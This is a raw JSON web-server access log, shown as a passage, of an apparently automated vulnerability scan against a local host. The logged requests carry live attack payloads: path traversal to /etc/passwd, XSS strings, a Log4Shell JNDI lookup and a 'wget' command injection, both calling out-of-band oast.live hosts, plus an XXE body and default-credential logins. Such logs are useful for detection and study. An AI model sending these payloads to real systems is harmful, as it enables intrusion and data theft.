"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://ca28fg0smpvbd3qg07h0rhfrjsmbjnpt3.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.ca28fg0smpvbd3qg07h0d9n83pt7wufb9.oast.live}"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"key=';`wget http://ca28fg0smpvbd3qg07h0zfedjgjzqbw7b.oast.live`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22
\x22:1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi 